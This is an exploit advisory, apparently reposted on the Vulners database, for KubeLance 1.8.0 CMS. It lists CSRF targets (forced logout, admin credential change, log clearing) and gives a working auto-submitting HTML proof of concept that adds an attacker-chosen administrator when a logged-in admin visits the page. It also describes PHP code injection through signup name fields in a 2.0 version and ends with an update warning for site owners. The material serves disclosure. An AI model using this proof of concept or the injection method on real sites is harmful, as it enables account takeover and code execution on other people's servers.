Vulners
Lucene search
KubeLance 1.8.0 Cross Site Request Forgery / Cross Site Scripting
`===========================================================
Vulnerable Software: KubeLance: 1.8.0
Official Site: kubelabs.com
===========================================================
Vuln Desc:
KubeLance: 1.8.0 suffers from multiple CSRF and XSS+HTML injection vulns.
Below i'll show to you ONLY CSRF exploitation but mixing it with XSS payload possible and exploitable.
(For exploitate CSRF+XSS simply change forms and corresponding values to XSS payload thats all)
===========================================================
Using CSRF vuln in this situation:
Possible #1:
forcing admin to logout:
http://demos.kubelabs.com/kubelance/adm/logout.php
Possible #2:
To change admin user name+password:
adm/admin_edit.php?id=1
Possible #3:
Clear logs:
/adm/log_viewer.php?clear=1
etc.
===========================================================
/*Will affect*/
If Currently logged admin visits crafted page which contains POC code.
Will ve Pwned ASAP.
===========================================================
Demo: http://demos.kubelabs.com/kubelance/
Just one POC:
============================== BEGIN OF PROOF OF CONCEPT EXPLOIT ===================================
<html>
<head>
<title>KubeLance: 1.8.0 CSRF exploitation POC</title>
</head>
<p>KubeLance: 1.8.0 CSRF CSRF ADD ADMIN POC</p>
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://CHANGE_TO_RTARGET/kubelance/adm/admin_add.php">
<input name="username" type="hidden" class="textbox" id="username" style="width:60%" value="me">
<input name="password" type="hidden" class="textbox" id="password" style="width:60%" value="me">
</form>
<!-- Username:me -->
<!-- Password:me -->
</body>
</html>
============================== END OF PROOF OF CONCEPT EXPLOIT===================================
Note1: Maybe previous versions also affected but not tested by me.
Note2:
In wild: I found site which uses Kubelance CMS which's *includes/config.php* says it is:
$config['version'] = '2.0';
6149742 -rw-r--r-- 1 ************** apache 2854 Apr 9 2010 config.php
Version 2 (But i can't find that exact version on vendor site)
Just note: That version ($config['version'] = '2.0';) is prone to PHP CODE Execution
(While signup First name and Last name sections(inputboxes) can be injected with PHP CODE
in eg:
<?php phpinfo();?>
On submit this gives error and as result PHP code executes on server side:
http://s019.radikal.ru/i618/1203/14/0ab995b456cd.png
Beaware: Anyone who uses that version:Update your software ASAP and check your site for backdoors,change all your configs,cpanel,ftp passwords,
email passwords and never use same passwords everywhere.
My Apogolises Kubelance Guys:
While testing it online (http://demos.kubelabs.com/kubelance/) i down'ed it mistakely:D
Sorry 1000 times for this:(
Peace
/AkaStep ^_^
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Mar 2012 00:00Current
0.2Low risk
Vulners AI Score0.2